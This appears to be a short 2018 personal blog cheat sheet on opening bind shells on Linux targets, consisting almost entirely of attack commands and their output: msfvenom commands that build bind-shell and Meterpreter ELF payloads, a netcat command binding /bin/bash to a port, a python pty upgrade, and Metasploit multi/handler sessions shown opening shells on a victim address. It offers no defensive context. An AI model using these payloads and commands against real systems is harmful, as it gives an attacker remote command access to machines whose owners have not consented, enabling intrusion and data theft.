środa, 12 grudnia 2018

bind shell



msvenom bind shell:

vitim:
msfvenom -p linux/x64/shell_bind_tcp  LPORT=2222  -f elf > shell.elf
./shell.elf

attacker:
nc IP_VICTIM 2222
python -c 'import pty;pty.spawn("/bin/bash")'

OR

msf exploit(multi/handler) > use multi/handler
msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/shell_bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  2222             yes       The listen port
   RHOST  172.21.65.139    no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > exploit

[*] Started bind TCP handler against 172.21.65.139:2222
[*] Command shell session 3 opened (10.0.3.15:46445 -> 172.21.65.139:2222) at 2018-12-12 11:54:51 +0100


ls
dirtyc0w




netcat:
nc -lvp 8080 -e /bin/bash <- victim
nc IP_VICTIM 8080 <-- attacker


Bind shell meterpreter

victim:
msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=2223 -f elf > shell_meterpreter_bind_2223.elf
chmod +x shell_meterpreter_bind_2223.elf
./shell_meterpreter_bind_2223.elf

attacker:
msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/meterpreter/bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  2223             yes       The listen port
   RHOST  172.21.65.139    no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > exploit

[*] Started bind TCP handler against 172.21.65.139:2223
[*] Sending stage (861480 bytes) to 172.21.65.139
[*] Meterpreter session 6 opened (10.0.3.15:41461 -> 172.21.65.139:2223) at 2018-12-12 12:04:01 +0100

meterpreter >